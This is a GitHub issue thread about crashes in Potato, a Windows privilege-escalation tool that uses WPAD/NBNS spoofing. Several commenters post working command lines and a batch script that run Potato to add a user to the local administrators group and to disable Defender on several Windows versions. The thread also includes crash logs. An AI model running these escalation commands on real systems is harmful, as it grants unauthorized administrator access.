search

foxglovesec / Potato

685 stars 166 forks source link

Potato.exe have stopped working #3

Open ghost opened 8 years ago

ghost commented 8 years ago

Hello, I'have download the Potato-master, and i'm trying to run it on Windows Server 2012 R2.

The command that I'm using:

Potato.exe -ip 172.16.21.89 -cmd "C:\Windows\System32\cmd.exe /K net localgroup administrators project /add" -disable_exhaust true -disable_defender true

Now the IP (of the system that running the potato.exe) & the account name "project" are correct, and every time when the programs says "Spoofed Target WPAD succesfully..." the Windows Server pop a "Potato.exe have stopped working".

freeload101 commented 8 years ago

Bump. Thanks!

same here win7 ultimate with admin or without. both crash on all bins of potato.exe as of 05/24/2016

`@echo off

FOR /f "tokens=1 delims=:" %%d IN ('ping %computername% -4 -n 1 ^| find /i "reply"') do (FOR /F "tokens=3 delims= " %%g IN ("%%d") DO set ip_address=%%g) echo %ip_address%

echo "Windows 7"

Potato.exe -ip %ip_address% -cmd "c:\windows\System32\cmd.exe /K net localgroup administrators %USERNAME% /add" -disable_exhaust true pause

echo "Windows Server 2008" Potato.exe -ip %ip_address% -cmd "c:\windows\System32\cmd.exe /K net localgroup administrators %USERNAME% /add" -disable_exhaust true -disable_defender true --spoof_host WPAD.EMC.LOCAL pause

echo "Windows 8/10/Server 2012 This takes 24 hrs or hack date " Potato.exe -ip %ip_address% -cmd "c:\windows\System32\cmd.exe /K net localgroup administrators %USERNAME% /add" -disable_exhaust true -disable_defender true pause

`

mpgn commented 8 years ago

Also crash on Windows 2012 R2

.\Potato.exe -ip 192.168.111.153 -c "C:\\Windows\System32\\cmd.exe /K net localgroup administrators user1 /add" -disable_exhaust true -disable_defender true
Starting NBNS spoofer...WPAD = 127.0.0.1
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...
Clearing dns and nbns cache...

Unhandled Exception: NHttp.NHttpException: Failed to start HTTP server ---> Syst
em.Net.Sockets.SocketException: An attempt was made to access a socket in a way
forbidden by its access permissions
   at System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress
socketAddress)
   at System.Net.Sockets.Socket.Bind(EndPoint localEP)
   at System.Net.Sockets.TcpListener.Start(Int32 backlog)
   at NHttp.HttpServer.Start() in c:\Users\breens\Documents\Visual Studio 2013\P
rojects\NHttp\NHttp\HttpServer.cs:line 105
   --- End of inner exception stack trace ---
   at NHttp.HttpServer.Start() in c:\Users\breens\Documents\Visual Studio 2013\P
rojects\NHttp\NHttp\HttpServer.cs:line 124
   at Potato.HTTPNtlmHandler.startListening(String cmd, String[] wpad_exclude, I
nt32 port) in F:\Potato\source\Potato\Potato\Program.cs:line 198
   at System.Threading.ExecutionContext.Run(ExecutionContext executionContext, C
ontextCallback callback, Object state)
Lyuu17 commented 6 years ago

Mine crashes on "public byte[] InitSecContext(byte[] token, int offset, int len)" function of SharpCifs.